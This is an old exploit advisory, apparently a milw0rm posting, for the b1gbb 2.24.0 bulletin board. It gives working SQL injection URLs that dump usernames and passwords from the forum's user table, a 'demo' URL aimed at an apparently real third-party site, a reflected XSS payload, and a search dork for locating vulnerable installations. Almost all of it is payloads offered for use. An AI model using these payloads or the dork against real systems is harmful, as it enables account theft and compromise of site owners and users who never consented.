# b1gbb 2.24.0 (SQL/XSS) Remote Vulnerabilities
# D.Script :
http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip
# Exploits SQL :
//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
OR
/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
Demo
http://www.gkovacs.de/forum/showboard.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6,concat(username,passwort),8%20FROM%20cebb_user%20%20where%20id=1/*
# Exploit XSS :
/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
# Dork:
"powered by b1gBB (b1g Bulletion Board)"
# Discovered by:
GoLd_M = [Mahmood_ali] & t0pP8uZz
# Homepage:
http://www.Tryag.Com/cc
# Sp.Thanx To :
Tryag-Team & G0t-Root.Net
# milw0rm.com [2007-06-28]